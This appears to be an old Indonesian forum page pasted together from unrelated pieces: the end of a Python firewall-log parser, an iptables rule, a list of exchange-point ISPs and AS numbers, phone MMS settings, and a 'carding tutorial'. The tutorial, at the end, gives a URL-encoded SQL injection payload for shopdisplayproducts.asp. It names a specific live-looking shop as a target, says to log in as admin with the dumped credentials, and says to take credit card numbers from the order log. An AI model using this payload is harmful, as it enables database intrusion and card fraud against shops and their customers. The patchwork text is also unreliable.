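Oct 29 10:15:33 fw kernel: fp=SYNFLOOD:1 a=DROP IN=eth0 OUT= SRC=203.0.113.5 DST=198.51.100.1 LEN=60 TTL=52 PROTO=TCP SPT=40001 DPT=80 SYN
Oct 29 10:15:35 fw kernel: fp=UDP:2 a=REJECT IN=eth0 OUT= SRC=10.0.0.9 DST=198.51.100.1 LEN=32 TTL=64 PROTO=UDP SPT=1024 DPT=111
Oct 29 10:15:36 fw kernel: fp=SPECIALPORT:1 a=DROP IN=eth0 OUT= SRC=192.0.2.77 DST=198.51.100.1 LEN=40 TTL=64 PROTO=TCP SPT=1030 DPT=12345
Oct 29 10:15:40 fw sshd[123]: Accepted publickey for admin from 10.0.0.5
"""


def parse_log_line(line):
    """Return a dict for a LOG line carrying an fp= prefix, or None for other syslog lines."""
    m = PREFIX_RE.search(line)
    if m is None:
        return None  # sshd, cron, ... lines are not firewall events
    rec = {"class": m.group("cls"), "id": int(m.group("id")), "action": m.group("action")}
    # Only the text after the prefix holds the kernel's KEY=VALUE fields.
    for key, value in FIELD_RE.findall(line[m.end():]):
        rec[key] = value
    return rec


def summarize(lines):
    """Count events per (class, action) pair and per source address."""
    by_class, by_src = Counter(), Counter()
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        by_class[(rec["class"], rec["action"])] += 1
        by_src[rec.get("SRC", "?")] += 1
    return by_class, by_src


def noisy_sources(lines, threshold=2):
    """Sources that hit the scan/flood chains at least `threshold` times, sorted."""
    hits = Counter()
    for line in lines:
        rec = parse_log_line(line)
        if rec is not None and rec["class"] in SCAN_CLASSES:
            hits[rec.get("SRC", "?")] += 1
    return sorted(src for src, n in hits.items() if n >= threshold)


if __name__ == "__main__":
    by_class, by_src = summarize(SAMPLE_LOG.splitlines())
    for (cls, action), n in sorted(by_class.items()):
        print(f"{cls:12s} {action:7s} {n}")
    print("noisy sources:", noisy_sources(SAMPLE_LOG.splitlines()))
```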

Additional menu

#############

iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 3128

IDC (Cyber Building) IIX-JKT2
ISP - AS Number - Connection
- Jasatel AS 9785 FastEther
- Starcall AS 9251 FastEther
- Nusanet AS 23679 FastEther
- Thamrin AS 23952 FastEther
- Mitranet AS 23691 FastEther
- IconPLN AS 9341 FastEther
- VIPnet AS 23698 FastEther
- Napsindo AS 17907 FastEther
- The.Net AS 10208 FastEther
- Gen.ID AS 23950 FastEther
- GerbangNet AS 18251 FastEther
- Elga AS 23695 FastEther
- FirstAsia AS 23696 FastEther
- EzyNet AS 18056 FastEther
- BNA AS 18189 FastEther
- TripleGate AS 17910 FastEther
- CSM AS 18379 FastEther
- Padinet AS 23756 FastEther
- Reach AS 4637 FastEther
- Uninet AS 17884 FastEther
- SatNet AS 17826 FastEther
- Multidata AS 18153 FastEther
- Melsa.net AS 9657 FastEther
- KSNet AS 18112 FastEther
- JavaNet AS 18393 FastEther
- IptekNet AS 3583 FastEther
- SpeedNet AS 9251 FastEther
- Patrakom AS 10137 FastEther
- Angkasa AS 17450 FastEther
- Solusi AS 17995 FastEther
- GPNet AS 18394 FastEther
- SpotNet AS 4833 FastEther
- Jogjamedianet AS 23671 FastEther
- IPnet AS 18347 FastEther
- Rainbow AS 23945 FastEther
- Central AS 9228 FastEther
- Exelcom AS 17885 FastEther
- UIInet AS 17996 FastEther
- BizNet AS 17451 FastEther
- Indika AS 23694 FastEther
- Quasar AS 18364 FastEther
- Eranet AS 17440 FastEther
- Easynet AS 23651 FastEther
- TopNet AS 23946 FastEther
- LinkNet AS 9905 FastEther
- InfoAsia AS 10220 FastEther
- Indonet AS 9340 FastEther
- CBN AS 4787 FastEther
- Indosat AS 4795 FastEther
- Visionnet AS 18237 FastEther
- Dnet AS 9794 FastEther
- Idola AS 4800 FastEther
- KadinNet Static FastEther
- Jalawave AS 23697 FastEther
- PSN AS 9875 FastEther
- Jetscom AS 17671 FastEther
- Infokom AS 17670 FastEther
- Bolehnet AS 9462 FastEther
- DTP AS 18059 FastEther
- Kabelvision AS 23700 FastEther
- NTT Indonesia AS 10217 FastEther
- Satelindo AS 17922 FastEther
- Okenet AS 4832 FastEther
- TelkomNet AS 17974 FastEther
- PacificNet AS 4855 FastEther
- Infonet AS 2008 FastEther
- Asiakomnet AS 18052 FastEther
- Commercenet Static FastEther
- JII AS 17800 FastEther
- NAP Info AS 17727 FastEther
- AsiaNet AS 10114 FastEther
- Inter.net AS 18103 FastEther
- CityNet AS 17769 FastEther
- Radnet AS 4434 FastEther
- Centrin AS 9326 FastEther
- Bitnet AS 18156 FastEther
- IPTK AS 23699 FastEther
- Telkomsel AS 23693 FastEther
- Estiko AS 23692 Serial
- Qita Static Serial
- Sistelindo AS 2687 Serial
- PrimaNet AS 17658 Serial
- Internux Static Serial
- Teras AS 4821 Serial
- Circlecom AS 17538 Serial

GCC (Telkom Building) IIX-JKT1
ISP - AS Number - Connection
- AccessNet AS 7587 Ethernet
- RadNet AS 4434 Ethernet
- Centrin AS 9326 Ethernet
- Mahatel AS 7083 Ethernet
- Idola AS 4800 Ethernet

Napinfo (Kuningan) IIX-JKT3
ISP - AS Number - Connection
- Napinfo AS 17727 FastEther
- Inter.net AS 18103 FastEther
- Asianet AS 10114 FastEther
- Orbicom AS 23948 FastEther
- Radnet AS 4434 FastEther

Post by : No_Name on [ 26 October 2005 07:57:07 ]

GPRS Settings

Manual MMS settings via Telkomsel GPRS

Manual MMS settings via Telkomsel GPRS for Siemens A65, CF62, C60, M55, MC60, S55, SL55

Step 1: Create the GPRS settings

1. Press Menu
2. Select Setup
3. Select Connectivity
4. Select GPRS and tick it (√)
5. Select Data Services
6. Select MMS, WAP
7. Select slot 1 or another slot
7a. Rename it:
- Press Option
- Press Rename
- Enter: MMS Telkomsel
- Press Save
7b. Press Edit, then press Yes
8. Select GPRS Settings
8a. Tick (√) GPRS Settings
8b. Select Edit
9. Fill in the parameters as follows:
- APN : mms
- Login : wap
- Password : wap123
10. Press Save
11. Continue to step 2

Step 2: MMS settings

1. Press Menu
2. Select Message
3. Select Msg. setup
4. Select MMS profiles
5. Select MMS or another slot.
5a. Rename it:
- Press Options
- Press Rename
- Enter: MMS Telkomsel
- Press OK
5b. Press Options, then press Change sett.
6. Fill in the parameters as follows:
- Expiry time : Maximum
- Def. Priority : Normal
- Def. duration : 010.0
- Retrieval : Automatic
- MMS Relaysrv. : http://mms.telkomsel.com
- IP Settings : 010.001.089.150
  Port : 9201
  The 2nd port and 2nd address do not need to be filled in
- Conn. profile : Select MMS Telkomsel
7. Done

Post by : Siemens on [ 24 October 2005 11:23:47 ]

Carding tutorial

Carding Tutorial by god_army

Here I want to share a bit of a tutorial about carding, which uses a script that exploits websites that are still vulnerable to the script I made.

Actually the script can still be modified further according to your needs, but that is up to you ... hehe..hehe.

The first step is to find a target site that we want to test for being vulnerable or not; we search for it on Google with the keyword:

/shop/shopdisplayproducts.asp atau

shopdisplayproducts.asp

Once you've got a site you want to make the target, try this script on it --> ?cat=´%

20and%201=convert(int,(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%

20tbluser))--sp_password

For example, say we get the target www.masih-vuln.com/shopdisplayproducts.asp?weleh=uhui

Then we put the script after shopdisplayproducts.asp, so it becomes like this:

www.masih-vuln.com/shopdisplayproducts.asp?cat=´%20and%201=convert(int,(select%20top%

201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))--sp_password

So, what happens ...? Nothing happens; instead this comes up:

The page cannot be found

The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.

--------------------------------------------------------------------------------

If that happens, it means that site can't be fed a script like that; try looking for another one.

If the site is still vulnerable, the admin's username and password will come out; once we have them we just log in with the username and password we found.

As an example of a site that is still vulnerable:

http://www.ilovesport.com.au so it becomes:

http://www.ilovesport.com.au/shop/shopdisplayproducts.asp?cat=´%20and%201=convert(int,

(select%20top%201%20fldusername%2b´/´%2bfldpassword%20from%20tbluser))--sp_password

And what comes out is the admin's username and password; after that we just log in with that username and password at

http://www.ilovesport.com.au/shop/admin.asp

hehehehe ... heheheheh

it worked, right ....

after that go into the order log and look for the credit cards there.
